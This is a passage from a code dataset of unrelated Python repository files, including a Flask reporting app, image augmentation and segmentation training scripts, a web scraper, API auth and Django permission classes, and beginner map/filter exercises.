self.invert_color(img)]\n\n def augment(self, batch):\n # Roll the dice\n prob = random.random()\n\n # Half chance of nothing half do some augmentation\n if prob < 0.5:\n return batch\n else:\n # Do a copy of the batch\n new_batch = batch\n\n # Flip steering independent of other augmentations (Idea is to have more steering actions on training)\n batch_fliped = self.flip_horizontal(new_batch)\n\n # Do augmentations based on the lambda list __list_func\n idx = 0\n for (img, label) in batch_fliped:\n # Choose one operation to be applied on each image of the batch\n operation = randint(0, len(self.__list_func) - 1)\n # Choose the operation randomically\n img = self.__list_func[operation](img)\n batch_fliped[idx] = (img, label)\n idx += 1\n\n return batch_fliped\n\n def convert_to_gray(self, img):\n # Get each channel\n r, g, b = img[:, :, 0], img[:, :, 1], img[:, :, 2]\n gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n # To keep same number of channels add gray to each one.\n img[:, :, 0] = gray\n img[:, :, 1] = gray\n img[:, :, 2] = gray\n return img\n\n def convert_to_sepia(self, img):\n # Get each channel\n r, g, b = img[:, :, 0], img[:, :, 1], img[:, :, 2]\n # To keep same number of channels add gray to each one.\n img[:, :, 0] = 0.393 * r + 0.769 * g + 0.189 * b\n img[:, :, 1] = 0.349 * r + 0.686 * g + 0.168 * b\n img[:, :, 2] = 0.272 * r + 0.534 * g + 0.131 * b\n return img\n\n def add_noise(self, img):\n new_img = skimage.util.random_noise(img,var=0.001)\n return new_img\n\n def invert_color(self, img):\n new_img = skimage.util.invert(img)\n return new_img\n\n def add_gaussian(self, img):\n new_img = skimage.filters.gaussian(img,sigma=0.9, multichannel=True)\n return new_img\n\n def color_swap(self, img):\n new_img = img\n list_chanels = [0, 1, 2]\n random.shuffle(list_chanels)\n new_img[:, : ,0] = img[:, :, list_chanels[0]]\n new_img[:, :, 1] = img[:, :, list_chanels[1]]\n new_img[:, :, 2] = img[:, :, list_chanels[2]]\n return new_img\n\n # Flip both the image and the steering\n def flip_horizontal(self, batch):\n # Do a copy of the batch\n new_batch = batch\n idx = 0\n for (img, label) in new_batch:\n img = np.fliplr(img)\n label = np.fliplr(label)\n new_batch[idx] = (img, label)\n idx += 1\n return new_batch\n\n def display_batch(self, batch):\n for img, steering in batch:\n plt.imshow(img)\n plt.show()","repo_name":"leonardoaraujosantos/LearnSegmentation","sub_path":"src/tensorflow/augment_batch.py","file_name":"augment_batch.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"96"} +{"seq_id":"37461800652","text":"from flask import Flask, request, render_template, jsonify, url_for, send_file\nimport pandas as pd\nimport subprocess\nimport os\nimport io\nimport tempfile\nimport plotly.express as px\nimport plotly.io as pio\nfrom award import main\n\n\napp = Flask(__name__)\n\n@app.after_request\ndef add_header(response):\n if 'Cache-Control' not in response.headers:\n response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0'\n return response\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"POST\":\n quarter = int(request.form[\"quarter\"]) # Get the selected quarter from the form\n year = request.form.get('year')\n action = request.form.get('action')\n print(action)\n \n try:\n df_data = process_quarter(quarter, year)\n if action == 'download':\n fname = f\"quarterly_{quarter}_report.csv\"\n fname = download_csv(df_data, fname)\n return jsonify({'success': True, 'filename': fname, 'action': 'download'})\n elif action == 'plot':\n return bonus_chart(quarter,year)\n\n except AttributeError:\n return jsonify({'error': \"No data present for this quarter or year yet\"})\n except Exception as e:\n return jsonify({'error': f\"An error occurred: {e}\"})\n else:\n return render_template(\"index.html\")\n\n@app.route(\"/download/\")\ndef download_file(filename):\n try:\n return send_file(os.path.join('static', filename), as_attachment=True, mimetype='text/csv')\n except Exception as e:\n return str(e)\n\n@app.route(\"/delete/\", methods=['POST'])\ndef delete_file(filename):\n file_path = os.path.join('static', filename)\n try:\n os.remove(file_path)\n return jsonify({'success': True})\n except Exception as e:\n return jsonify({'error': str(e)})\n\n\n\n@app.route(\"/bonus_plot//\", methods=[\"GET\"])\ndef bonus_plot(quarter, year):\n df = process_quarter(quarter, year)\n\n \n # Sort the dataframe by 'Total Bonus'\n df = df.sort_values('Total Bonus')\n \n fig = px.bar(df, \n x='Driver ID', \n y='Total Bonus', \n color='Total Bonus', # change the color to be based on 'Total Bonus'\n title='Total Bonus per Driver',\n hover_data=['Total Bonus'], # this will add a hover text for 'Total Bonus'\n labels={'Total Bonus':'Total Bonus', 'Driver ID':'Driver ID'})\n\n # Convert the figures to HTML and remove the surrounding tags\n plot_html = pio.to_html(fig, full_html=False)\n \n return render_template('plot.html', plot=plot_html)\n\n@app.route(\"/bonus_chart///\", methods=[\"GET\"])\ndef bonus_chart(quarter, year, driver_id = None):\n df = process_quarter(quarter, year, str(driver_id))\n # Sort the dataframe by 'Total Bonus'\n df = df.sort_values('Total Bonus')\n # print(df.to_json(orient='records'))\n # Send DataFrame as JSON to the client\n return render_template('chart.html', data=df.to_json(orient='records'), driverId=driver_id, year=year, quarter=quarter)\n\n@app.route(\"/scorecard///\", methods=[\"GET\"])\ndef score_card(quarter, year, driver_id):\n df = process_quarter(quarter, year, str(driver_id))\n df = df.sort_values('Total Bonus')\n return render_template('scorecard.html', data=df.to_json(orient='records'), driverId=driver_id, year=year, quarter=quarter)\n\n@app.route(\"/pie//\", methods=[\"GET\"])\ndef pie(quarter, year):\n print(\"hello\")\n df = process_quarter(quarter, year)\n df = df.sort_values('Total Bonus')\n return render_template('pie.html', data=df.to_json(orient='records'), year=year, quarter=quarter)\n\n\n\n\ndef process_quarter(quarter: int, year: int, driver_id = None):\n \"\"\"Process the file and delete it afterwards.\"\"\"\n print(driver_id)\n return main(int(quarter), int(year), driver_id)\n\n# def download_csv(df: pd.DataFrame, fname:str):\n# temp = tempfile.NamedTemporaryFile(suffix=\".csv\")\n# df.to_csv(temp.name, index=False)\n# return send_file(temp.name, as_attachment=True, attachment_filename=fname)\ndef download_csv(df: pd.DataFrame, fname:str):\n if not os.path.isdir('static'):\n os.makedirs('static')\n file_path = os.path.join('static', fname)\n df.to_csv(file_path, index=False)\n return fname\n\n\nif __name__ == \"__main__\":\n app.run(host=\"127.0.0.1\", port=8080, debug=True)\n\n\n\n#4400324","repo_name":"armaanchhina/safety_award-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23093324361","text":"from bids import BIDSLayout\nimport bids\nimport tempfile\nimport argparse\nimport os\nimport sys\nimport time\nimport math\n\ndef check_subject_session_directories( path, base, sub, session ):\n dirs = os.listdir( os.path.join(path, sub, session) )\n os.mkdir( os.path.join(base, sub, session) )\n for d in dirs:\n os.symlink(os.path.join(path,sub,session,d), os.path.join(base, sub, session,d) )\n \n try:\n x = BIDSLayout(root=base)\n except:\n print(\"FAILURE - \" + sub + \" - \" + session + \" - \" + d)\n ret = False\n os.unlink( os.path.join(base, sub, session,d) )\n\n os.rmdir( os.path.join(base, sub, session) )\n\ndef check_subject_sessions(path, base, sub):\n sessions = os.listdir( os.path.join(path, sub ) )\n os.mkdir( os.path.join(base, sub) )\n for ses in sessions:\n #print(\"subject - \" + sub + \", session - \" + ses)\n os.symlink( os.path.join(path,sub,ses), os.path.join(base, sub, ses) )\n \n try:\n x = BIDSLayout(root=base) \n except:\n print(\"FAILURE - \" + sub + \" - \" + ses)\n os.unlink( os.path.join(base, sub, ses))\n check_subject_session_directories( path,base,sub,ses )\n ret = False\n\n if os.path.isdir( os.path.join(base, sub, ses) ):\t\n os.unlink(os.path.join(base, sub, ses))\n \n os.rmdir( os.path.join(base, sub) )\n\ndef check_subject_level(path, base, sub):\n \n os.symlink( os.path.join(path,sub), os.path.join(base,sub) )\n ret = True\n try:\n x = BIDSLayout(root=base)\n except:\n ret = False\n os.unlink(os.path.join(base,sub))\n\n return(ret)\n\n\n\n\ndef main():\n\n # avoid warning\n bids.config.set_option('extension_initial_dot', True)\n \n my_parser = argparse.ArgumentParser(description='Identify abdominal slab')\n my_parser.add_argument('-p', '--path', type=str, help='base path', required=True)\n my_parser.add_argument('-t', '--temp', type=str, help='temp path', required=False, default=\"/scratch\")\n args = my_parser.parse_args()\n\n tpath = args.temp\n if not os.path.isdir(tpath):\n tpath = \"/tmp\" \n\n jobid = os.environ[\"LSB_JOBID\"]\n base = tempfile.mkdtemp(dir=tpath, prefix=\"job_\"+str(jobid)+\"_\", suffix=\"_bidslayout\")\n #print(base) \n\n sTime = time.time()\n items = os.listdir(path=args.path)\n print(\"Checking \" + str(len(items)) + \" items\" )\n desc = os.path.join(args.path, \"dataset_description.json\")\n print(desc) \n if not os.path.isfile(desc):\n print(\"Missing: \"+desc)\n exit(1)\n os.symlink(desc, os.path.join(base, \"dataset_description.json\"))\n\n failure=[]\n items.remove(\"dataset_description.json\")\n for i,itm in enumerate(items):\n #print(\"Testing: \"+itm+\" \"+str(i)+\"/\"+str(len(items)))\n if not check_subject_level(args.path, base, itm):\n failure.append(itm)\n print(\"FAILURE - \"+str(itm))\n check_subject_sessions(args.path, base, itm)\n\n\n os.unlink(os.path.join(base, \"dataset_description.json\"))\n os.rmdir(base)\n\n ret=0\n if len(failure) > 0:\n ret=1\n print(failure)\n\n rTime = time.time() - sTime\n h = math.floor( rTime / 60 / 60)\n m = math.floor( (rTime - 60*60*h)/60 )\n s = math.floor( (rTime - 60*60*h - 60*m) )\n print(\"Run time = \" + str(h) + \"h \" + str(m) + \"m \" + str(s) + \"s\")\n\n print(\"Done\")\n return(ret)\n \n \n\nif __name__==\"__main__\":\n sys.exit(main())\n","repo_name":"ftd-u01/checkBids","sub_path":"checkBids.py","file_name":"checkBids.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26160075007","text":"import sys\nimport time\n\nsys.stdin = open(\"ExpertAcademy1244.txt\")\n\nstart = time.time()\n\n\n# 첫제출(시간초과)\ndef powerset(arr, cnt):\n if cnt == change:\n global res\n global maxs\n an = ''\n for f in arr:\n an += f\n maxs += 1\n print(an, maxs)\n res.append(int(an))\n return\n tarr = arr.copy()\n for g in range(len(arr)):\n for f in range(len(arr)):\n if f != g:\n tarr[f], tarr[g] = tarr[g], tarr[f]\n powerset(tarr, cnt + 1)\n\n\nfor tc in range(int(input())):\n maxs = 0\n num, change = input().split()\n num = list(num)\n change = int(change)\n res = []\n powerset(num, 0)\n print(len(res), res)\n print(\"#{} {}\".format(tc + 1, max(res)))\nprint('time', time.time() - start)\n","repo_name":"namnamDev/namnamDev","sub_path":"ExpertAcademy1244.py","file_name":"ExpertAcademy1244.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"15744704409","text":"from typing import List\nfrom operators.property_sourcing_base import PropertySourcingBaseOperator\nfrom bs4 import BeautifulSoup\n\n\nclass MidLandRealitySourcingOperator(PropertySourcingBaseOperator):\n @staticmethod\n def get_sfa_gfa(space: List):\n if len(space) > 1:\n sfa, gfa = space[0].get_text().replace(\"SFA\", \"\").replace(\"ft²\", \"\").replace(\"\\xa0\", \"\"), \\\n space[1].get_text().replace(\"GFA\", \"\").replace(\"ft²\", \"\").replace(\"\\xa0\", \"\")\n return sfa, gfa\n elif len(space) == 1:\n return space[0].get_text().replace(\"SFA\", \"\").replace(\"ft²\", \"\").replace(\"\\xa0\", \"\"), None\n else:\n return None, None\n\n def get_property_info(self, html_source):\n import pandas as pd\n soup = BeautifulSoup(html_source, 'html.parser')\n \n rooms = []\n rents = soup.find_all(\"div\", class_=\"sc-1r1odlb-23 etCoIy\")\n\n for rent in rents:\n titles = rent.find(\"div\", class_=\"sc-wivooq-1 hCnCJl\").get_text()\n title_list = titles.strip().split(\"\\n\")\n title = title_list[0].strip()\n\n if len(title_list) < 3:\n sub_title = None\n else:\n sub_title = title_list[2].strip()\n\n space = rent.find_all(\"div\", class_=\"sc-gqqyk9-1 kYfBEV\")\n space_element = self.get_sfa_gfa(space)\n mon_price = rent.find(\"span\", class_=\"sc-hlnw2x-6 kktEPG\").get_text()[1:]\n location = rent.find(\"span\", class_=\"sc-1r1odlb-9 dHhWAt\").get_text()\n features = rent.find_all(\"div\", class_=\"sc-1r1odlb-16 gopLNA\")\n features_combined = \"\"\n\n for i in range(len(features) // 2):\n features_combined += features[i].get_text() + \"&&\"\n\n age = rent.find(\"div\", class_=\"sc-w2gv6f-0 eMkKmr\")\n\n if age:\n age = age.get_text()\n else:\n age = None\n\n url = rent.find('a', href=True)['href']\n room_idx = url.split(\"-\")[-1]\n\n room_info = {\"date\": self.execution_date, \"room_idx\": room_idx, \"title\": title, \"sub_title\": sub_title,\n \"sfa\": space_element[0], \"gfa\": space_element[1], \"mon_price\": mon_price, \"age\": age,\n \"location\": location, \"features_combined\": features_combined, \"url\": url}\n\n if room_info not in rooms:\n rooms.append(room_info)\n\n self.log.info(\"------- Property Info -------\")\n self.log.info(rooms)\n\n self.log.info(f\"# of properties: {len(rooms)}\")\n return rooms\n","repo_name":"yelee20/airflow-gke","sub_path":"dags/operators/midland_reality_sourcing.py","file_name":"midland_reality_sourcing.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"13837166174","text":"from abc import ABC, abstractmethod\n\nfrom aiohttp import ClientSession as Client\n\nfrom .web import Request\n\nclass Auth(ABC):\n 'Implement for any authentication scheme.'\n @abstractmethod\n async def sign(self, client: Client, request: Request) -> Request: pass\n\n @staticmethod\n def none() -> 'NoAuth': return NoAuth()\n\n\nclass UrlApiKey(Auth):\n 'URL parameter with a secret to authorize requests.'\n params: dict[str, str]\n\n def __init__(self, param_name: str, secret: str):\n self.params = {param_name: secret}\n\n async def sign(self, client: Client, request: Request) -> Request:\n request.query_params |= self.params\n return request\n\nclass HeaderApiKey(Auth):\n 'Header with a secret to authorize requests.'\n headers: dict[str, str]\n\n def __init__(self, param_name: str, secret: str):\n self.headers = {param_name: secret}\n\n async def sign(self, client: Client, request: Request) -> Request:\n request.headers |= self.headers\n return request\n\nclass NoAuth(Auth):\n 'Does nothing.'\n\n async def sign(self, client: Client, request: Request) -> Request: return request\n\n\n\n","repo_name":"dunkyl/SlyAPI-Python","sub_path":"src/SlyAPI/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"13022316750","text":"import os\n\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom architectures.custom_unet import U_Net as Model\nfrom dataset import SegmentationDataset\nfrom losses import tversky_loss, tversky_coeff\n\n\ndef train(model, device, train_loader, optimizer, epoch, scheduler=None):\n model.train()\n nb_samples = 0\n epoch_loss = 0\n\n for batch_idx, (data, target) in enumerate(train_loader):\n nb_samples += len(data)\n data, target = data.to(device), target.to(device)\n\n output = model(data)\n\n if isinstance(output, list):\n loss = tversky_loss(output[0], target, reduction=\"sum\")\n for i in range(1, len(output)):\n target_resized = F.interpolate(\n target, scale_factor=1 / 2 ** i, mode=\"bilinear\", align_corners=True\n )\n target_resized = torch.where(\n target_resized > 0.1,\n torch.tensor(1.0, device=device),\n torch.tensor(0.0, device=device),\n )\n loss = loss + tversky_loss(output[i], target_resized, reduction=\"sum\")\n loss = loss / len(output)\n else:\n loss = tversky_loss(output, target, reduction=\"sum\")\n\n epoch_loss += loss.item()\n loss = loss / len(data)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if scheduler:\n scheduler.step()\n\n print(\n \"Train Epoch: {} [{}/{} ({:.0f}%)], Loss: {:.6f}\".format(\n epoch,\n nb_samples,\n len(train_loader.dataset),\n 100.0 * (batch_idx + 1) / len(train_loader),\n loss.item(),\n ),\n end=\"\\r\",\n )\n\n epoch_loss /= len(train_loader.dataset)\n print(\n \"Train Epoch: {} [{}/{} ({:.0f}%)], Average Loss: {:.6f}\".format(\n epoch, nb_samples, len(train_loader.dataset), 100.0, epoch_loss\n )\n )\n return epoch_loss\n\n\ndef validate(model, device, test_loader):\n model.eval()\n test_loss = 0\n test_dice = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n if isinstance(output, list):\n output = output[0]\n test_loss += tversky_loss(output, target, reduction=\"sum\").item()\n test_dice += tversky_coeff(\n output, target, hard=True, reduction=\"sum\"\n ).item()\n\n test_loss /= len(test_loader.dataset)\n test_dice /= len(test_loader.dataset)\n print(\"Test set: Average score: {:.6f} (loss: {:.6f})\".format(test_dice, test_loss))\n return test_loss, test_dice\n\n\ndef checkpoint(model, test_dice, optimizer, epoch, input_size, weight_decay, infos=\"\"):\n file_name = \"{}_dice={:.3f}_{}_ep={}_{}_wd={}_{}.pth\".format(\n model.__class__.__name__,\n test_dice,\n optimizer.__class__.__name__,\n epoch,\n input_size,\n weight_decay,\n infos,\n )\n path = os.path.join(\"../../models/\", file_name)\n if test_dice > 0.47 and not os.path.isfile(path):\n torch.save(model.state_dict(), path)\n print(\"Saved: \", file_name)\n\n\ndef main():\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(device)\n\n # Hyperparams\n batch_size = 16\n epochs = 40\n input_size = (216, 320)\n weight_decay = 1e-4\n print(f\"Batch size: {batch_size}, input size: {input_size}, wd: {weight_decay}\")\n\n # Create datasets\n train_indices = np.load(\"../../data/processed/train_indices.npy\")\n test_indices = np.load(\"../../data/processed/test_indices.npy\")\n # valid_indices = np.load(\"../../data/processed/valid_indices.npy\")\n\n # Merge train and test\n # train_indices = np.concatenate((train_indices, test_indices))\n # test_indices = valid_indices\n\n # Make sure there's no overlap\n assert not set(train_indices) & set(test_indices)\n\n # Datasets\n train_set = torch.utils.data.Subset(\n SegmentationDataset(\n \"../../data/raw/training_set/\", input_size=input_size, train_mode=True\n ),\n train_indices,\n )\n test_set = torch.utils.data.Subset(\n SegmentationDataset(\n \"../../data/raw/training_set/\", input_size=input_size, train_mode=True\n ),\n test_indices,\n )\n print(\"Training set size: \", len(train_set))\n print(\"Test set size : \", len(test_set))\n print(\"Total: \", len(train_set) + len(test_set))\n\n # Dataloaders\n train_loader = torch.utils.data.DataLoader(\n dataset=train_set,\n batch_size=batch_size,\n shuffle=True,\n num_workers=4,\n pin_memory=True,\n )\n\n test_loader = torch.utils.data.DataLoader(\n dataset=test_set,\n batch_size=batch_size,\n shuffle=False,\n num_workers=4,\n pin_memory=True,\n )\n\n model = Model().to(device)\n print(Model.__name__)\n\n # he initialization\n for m in model.modules():\n if isinstance(m, (nn.Conv2d, nn.Linear)):\n nn.init.kaiming_normal_(m.weight, mode=\"fan_in\")\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n optimizer = torch.optim.SGD(\n model.parameters(), lr=1e-1, momentum=0.9, weight_decay=weight_decay\n )\n print(\"Optimizer: \", optimizer.__class__.__name__)\n\n scheduler = torch.optim.lr_scheduler.MultiStepLR(\n optimizer, milestones=[8, 14, 19, 25, 30, 35], gamma=0.1\n )\n\n train_loss_history = list()\n test_loss_history = list()\n test_dice_history = list()\n\n for epoch in range(1, epochs + 1):\n print(\"################## EPOCH {}/{} ##################\".format(epoch, epochs))\n\n for param_group in optimizer.param_groups:\n print(\"Current learning rate:\", param_group[\"lr\"])\n\n train_loss = train(model, device, train_loader, optimizer, epoch)\n test_loss, test_dice = validate(model, device, test_loader)\n\n scheduler.step()\n\n # Save model\n if epoch > 1 and test_dice > max(test_dice_history):\n checkpoint(\n model,\n test_dice,\n optimizer,\n epoch,\n input_size,\n weight_decay,\n infos=\"tversky_loss\",\n )\n\n train_loss_history.append(train_loss)\n test_loss_history.append(test_loss)\n test_dice_history.append(test_dice)\n\n # # Save history at each epoch (overwrite previous history)\n history = [train_loss_history, test_loss_history, test_dice_history]\n np.save(\"history.npy\", np.array(history))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Jonas1312/ChallengeHC18","sub_path":"src/models/train_segmentation.py","file_name":"train_segmentation.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"38458378504","text":"import privacyraven as pr\nfrom privacyraven.utils.data import get_emnist_data\n\n# from privacyraven.extraction.core import ModelExtractionAttack\nfrom privacyraven.m_inference.core import MembershipInferenceAttack\nfrom privacyraven.utils.query import get_target\nfrom privacyraven.models.victim import train_mnist_victim\nfrom privacyraven.models.pytorch import ImagenetTransferLearning, ThreeLayerClassifier\n\n# Create a query function for a PyTorch Lightning model\nmodel = train_mnist_victim()\n\n\ndef query_mnist(input_data):\n return get_target(model, input_data)\n\n\n# Obtain seed (or public) data to be used\nemnist_train, emnist_test = get_emnist_data()\n\nattack = MembershipInferenceAttack(\n query_mnist,\n 100,\n (1, 28, 28, 1),\n 10,\n (1, 3, 28, 28),\n \"copycat\",\n ThreeLayerClassifier,\n 1000,\n emnist_train,\n emnist_test,\n)\n","repo_name":"suhacker1/SecureMLExperiments","sub_path":"m_inf_mnist.py","file_name":"m_inf_mnist.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"6379784179","text":"from urllib.parse import urlparse\n\nfrom django.conf import settings\nfrom django.utils.http import is_same_domain\nfrom rest_framework import permissions\n\n\ndef _report_warning_to_rollbar(message, extra_data=None):\n ROLLBAR = getattr(settings, 'ROLLBAR', {})\n if ROLLBAR:\n import rollbar\n rollbar.report_message(message, level='warning', extra_data=extra_data)\n\n\ndef referring_host(request):\n referer = urlparse(request.META.get('HTTP_REFERER', ''))\n return referer.netloc.split(':')[0]\n\n\ndef referring_host_is_allowed(host):\n for pattern in settings.ALLOWED_HOSTS:\n if is_same_domain(host, pattern):\n return True\n return False\n\n\nclass IsAuthenticatedOrWebClient(permissions.BasePermission):\n def has_permission(self, request, view):\n if request.user and request.user.is_authenticated:\n return True\n\n if settings.OAR_CLIENT_KEY == '':\n return True\n\n if request.path.startswith(\"/api/info\"):\n return True\n\n client_key = request.META.get('HTTP_X_OAR_CLIENT_KEY')\n if client_key == settings.OAR_CLIENT_KEY:\n host = referring_host(request)\n if referring_host_is_allowed(host):\n return True\n else:\n _report_warning_to_rollbar(\n 'Unallowed referring host passed with API request',\n extra_data={'host': host})\n else:\n _report_warning_to_rollbar(\n 'Incorrect client key submitted with API request',\n extra_data={'client_key': client_key})\n\n return False\n\n\nclass IsAllowedHost(permissions.BasePermission):\n def has_permission(self, request, view):\n host = referring_host(request)\n if referring_host_is_allowed(host):\n return True\n else:\n _report_warning_to_rollbar(\n 'Unallowed referring host passed with API request',\n extra_data={'host': host})\n\n\nclass IsRegisteredAndConfirmed(permissions.BasePermission):\n message = 'Insufficient permissions'\n\n def has_permission(self, request, view):\n if not request.user.is_authenticated:\n return False\n\n if not request.user.is_active:\n return False\n\n if not request.user.did_register_and_confirm_email:\n return False\n\n return True\n","repo_name":"opensupplyhub/open-apparel-registry","sub_path":"src/django/api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"96"} +{"seq_id":"52549058","text":"from django.views.generic import TemplateView\nfrom ..models import AgentTransport\nfrom django.shortcuts import redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\n\nclass AgentTransportDeleteView(TemplateView):\n\n @login_required(login_url=reverse_lazy('login'))\n def delete_data_agent_transport(request, pk):\n agent_transport = AgentTransport.objects.get(pk=pk)\n agent_transport.delete()\n\n if request.method == \"GET\":\n filter_by = request.GET.get(\"filter_by\")\n date_filter = request.GET.get(\"date_filter\")\n if not date_filter:\n return redirect(reverse('agent-transport-table'))\n else:\n return redirect(reverse('agent-transport-table') + '?filter_by=' + filter_by + '&date_filter=' + date_filter)\n\n\n @login_required(login_url=reverse_lazy('login'))\n def delete_multiple_data_agent_transport(request):\n \n if request.method == \"POST\":\n pk_list = request.POST.getlist('pk')\n filter_by = request.POST['filter_by']\n date_filter = request.POST['date_filter']\n\n for pk in pk_list:\n agent_transport = AgentTransport.objects.get(pk=pk)\n agent_transport.delete()\n\n if not date_filter:\n return redirect(reverse('agent-transport-table'))\n else:\n return redirect(reverse('agent-transport-table') + '?filter_by=' + filter_by + '&date_filter=' + date_filter)","repo_name":"ipoobest/demo-auto-deployment","sub_path":"ndd-app/agent_transport/views/agent_transport_delete_view.py","file_name":"agent_transport_delete_view.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41005964480","text":"import logging\nimport os\nimport threading\nimport weakref\nfrom .models import ProbeSource\nfrom .sync import ProbeViewSync\n\n\nlogger = logging.getLogger(\"zentral.core.probes.conf\")\n\n\nclass ProbeView(object):\n def __init__(self, parent=None, with_sync=False):\n self.parent = parent\n self._probes = None\n self._lock = threading.Lock()\n self.with_sync = with_sync\n self.sync = None\n\n def clear(self):\n with self._lock:\n self._probes = None\n\n def iter_parent_probes(self):\n if self.parent is None:\n for p in ProbeSource.objects.active():\n yield p.load()\n else:\n yield from self.parent\n\n def _start_sync(self):\n if self.with_sync:\n if self.sync is not None:\n if self.sync.is_alive():\n return\n else:\n logger.error(\"Sync thread is not alive. Last heartbeat %s.\", self.sync.last_heartbeat or \"-\")\n # separate thread to listen to the probe change signal\n self.sync = ProbeViewSync(self)\n self.sync.start()\n\n def __iter__(self):\n with self._lock:\n self._load()\n yield from self._probes\n\n def __len__(self):\n with self._lock:\n self._load()\n return len(self._probes)\n\n\nclass ProbesDict(ProbeView):\n def __init__(self, parent=None, item_func=None, unique_key=True, with_sync=False):\n super(ProbesDict, self).__init__(parent, with_sync=with_sync)\n if item_func is None:\n self.item_func = lambda p: [(p.name, p)]\n else:\n self.item_func = item_func\n self.unique_key = unique_key\n\n def _load(self):\n self._start_sync()\n if self._probes is None:\n self._probes = {}\n for probe in self.iter_parent_probes():\n for key, val in self.item_func(probe):\n if self.unique_key:\n self._probes[key] = val\n else:\n self._probes.setdefault(key, []).append(val)\n\n def __getitem__(self, key):\n with self._lock:\n self._load()\n return self._probes[key]\n\n def keys(self):\n with self._lock:\n self._load()\n return self._probes.keys()\n\n def get(self, *args, **kwargs):\n with self._lock:\n self._load()\n return self._probes.get(*args, **kwargs)\n\n\nclass ProbeList(ProbeView):\n def __init__(self, parent=None, filter_func=None, with_sync=False):\n super(ProbeList, self).__init__(parent, with_sync=with_sync)\n self.filter_func = filter_func\n self._children = weakref.WeakSet()\n\n def clear(self):\n with self._lock:\n self._probes = None\n for child in self._children:\n child.clear()\n\n def _load(self):\n self._start_sync()\n if self._probes is None:\n self._probes = []\n for probe in self.iter_parent_probes():\n if self.filter_func is None or self.filter_func(probe):\n self._probes.append(probe)\n\n def filter(self, filter_func):\n child = self.__class__(self, filter_func)\n self._children.add(child)\n return child\n\n def dict(self, item_func=None, unique_key=True):\n child = ProbesDict(self, item_func, unique_key)\n self._children.add(child)\n return child\n\n def event_filtered(self, event):\n def _filter(probe):\n return probe.test_event(event)\n return self.filter(_filter)\n\n\n# used for the tests, to avoid having an extra DB connection\nzentral_probes_sync = os.environ.get(\"ZENTRAL_PROBES_SYNC\", \"1\") == \"1\"\n\n\nall_probes = ProbeList(with_sync=zentral_probes_sync)\nall_probes_dict = all_probes.dict(item_func=lambda p: [(p.pk, p)], unique_key=True)\n","repo_name":"zentralopensource/zentral","sub_path":"zentral/core/probes/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":705,"dataset":"github-code","pt":"96"} +{"seq_id":"10913233064","text":"numeros = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\ndef multiplicar_por_10(numero):\n\n return numero * 2\n\n\nnueva_multi = multiplicar_por_10(numeros)\nnueva_multi_2 = list(map(multiplicar_por_10, numeros))\n\nprint(nueva_multi)\nprint(nueva_multi_2)\n\n\ndef convertir_en_string_mas_unidad(numero):\n return f'{numero} seg'\n\n\nnuevo_output = list(map(convertir_en_string_mas_unidad, numeros))\nprint(nuevo_output)\n\n\ndef convertir_a_numeros_negativos(numero):\n return numero * -1\n\n\nlist(map(convertir_a_numeros_negativos, numeros))\n\n\ndef convertir_en_0_si_menor_a_5(numero):\n if numero < 5:\n return 0\n else:\n return numero\n\n\nlist(map(convertir_en_0_si_menor_a_5, numeros))\n\n\ndef convertir_en_true_si_mayor_a_6(numero):\n if numero > 6:\n return True\n else:\n return False\n\n\nlist(map(convertir_en_true_si_mayor_a_6, numeros))\n\n\n#filter\nnumeros_2 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\ndef numero_es_par(numero):\n if numero % 2 == 0:\n return True\n else:\n return False\n\nprint('Filter')\nprint(list(filter(numero_es_par, numeros_2)))\n\n\ndef palabra_tiene_mas_de_5_caracteres(palabra):\n if len(palabra) > 5:\n return True\n\n\npalabras = [\"achicoria\", \"pasto\", \"sol\", \"loquillo\", \"moquillo\", \"sed\", \"pez\", \"jacaranda\", \"mil\"]\n\nlist(filter(palabra_tiene_mas_de_5_caracteres, palabras))\n\n\ndef numero_es_negativo(numero):\n if numero < 0:\n return True\n\n\nnumeros = [3, 5, -1, -7, -8, 4, -78, 5, -46, 56, 98, 9, -1, -2, -4]\n\nlist(filter(numero_es_negativo, numeros))\n\n\ndef 